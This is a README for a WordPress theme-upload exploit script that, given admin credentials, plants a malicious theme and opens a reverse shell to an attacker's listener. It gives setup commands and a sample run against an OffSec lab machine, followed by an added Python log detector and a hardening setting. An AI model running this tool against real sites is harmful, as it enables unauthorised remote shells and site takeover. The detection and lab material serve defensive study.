WordPress Theme Upload Exploit

This script makes WordPress exploitation faster and more efficient by automating the theme upload instead of doing it manually. This saves a lot of time, since WordPress is often very slow or returns errors.

Setup

    git clone https://github.com/DLL00P/Wordpress-Theme-Upload-Exploit
    cd Wordpress-Theme-Upload-Exploit
    python3 exploit.py -u "URL" -U "USER" -P "PASSWORD" -lh "YOUR_IP" -lp "YOUR_PORT" -s "SHELL_TYPE"

Options

-u, --url       Target URL (e.g., http://127.0.0.1/)
-U, --username  WordPress username
-P, --password  WordPress password
-lh, --lhost    Attacker's local IP (listener host)
-lp, --lport    Attacker's local port (listener port)
-s, --shell     Shell type (bash, sh, powershell, cmd). Default: powershell
-t, --theme     Theme name. Default: EvilTheme

Usage

    python3 exploit.py -u http://192.168.110.55/shenzi/wp-admin/ -U admin -P FeltHeadwallWight357 -lh 192.168.45.199 -lp 1234 -s powershell 

This example was run against the Shenzi machine from OffSec; because it is a Windows machine, the shell type is set to powershell.
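Detection example (added here, not part of this repository's code): a log check that flags a successful theme upload followed shortly by a direct request to a PHP file inside a theme directory from the same client. It assumes combined-format access logs and WordPress's standard `update.php?action=upload-theme` endpoint; the log lines, IPs, requested file name and 5-minute window are constructed for illustration.

```python
import re
from datetime import datetime, timedelta

# Constructed access-log lines (combined format, documentation IP ranges).
# "EvilTheme" is the default theme name listed under Options above.
SAMPLE_LOG = """\
203.0.113.7 - - [12/Mar/2024:10:15:01 +0000] "POST /wp-login.php HTTP/1.1" 302 0 "-" "-"
203.0.113.7 - - [12/Mar/2024:10:15:03 +0000] "POST /wp-admin/update.php?action=upload-theme HTTP/1.1" 200 5120 "-" "-"
203.0.113.7 - - [12/Mar/2024:10:15:05 +0000] "GET /wp-content/themes/EvilTheme/index.php HTTP/1.1" 200 0 "-" "-"
198.51.100.20 - - [12/Mar/2024:10:20:00 +0000] "GET /wp-content/themes/twentytwentyfour/style.css HTTP/1.1" 200 900 "-" "-"
198.51.100.9 - - [12/Mar/2024:11:00:00 +0000] "POST /wp-admin/update.php?action=upload-theme HTTP/1.1" 200 80000 "-" "-"
"""

LINE_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) '
)
# Theme PHP files are normally loaded by WordPress itself, not requested directly.
THEME_PHP_RE = re.compile(r"^/(?:[^?]*/)?wp-content/themes/(?P<theme>[^/?]+)/[^?]*\.php(?:\?|$)")
WINDOW = timedelta(minutes=5)  # assumed correlation window

def is_theme_upload(method, path):
    # Dashboard theme upload: POST to wp-admin/update.php with action=upload-theme.
    return method == "POST" and "/wp-admin/update.php" in path and "action=upload-theme" in path

def find_upload_then_exec(log_text, window=WINDOW):
    """Return alerts for theme uploads followed by a direct theme .php request."""
    uploads = {}  # client IP -> time of its last successful theme upload
    alerts = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
        ip, path, status = m["ip"], m["path"], int(m["status"])
        if is_theme_upload(m["method"], path) and status < 400:
            uploads[ip] = ts
            continue
        hit = THEME_PHP_RE.match(path)
        if hit and ip in uploads and timedelta(0) <= ts - uploads[ip] <= window:
            alerts.append({"ip": ip, "theme": hit["theme"],
                           "uploaded": uploads[ip], "requested": ts, "path": path})
    return alerts

if __name__ == "__main__":
    for alert in find_upload_then_exec(SAMPLE_LOG):
        print(alert)
```

On sites where themes are never installed from the dashboard, defining `DISALLOW_FILE_MODS` as `true` in `wp-config.php` disables theme and plugin uploads altogether.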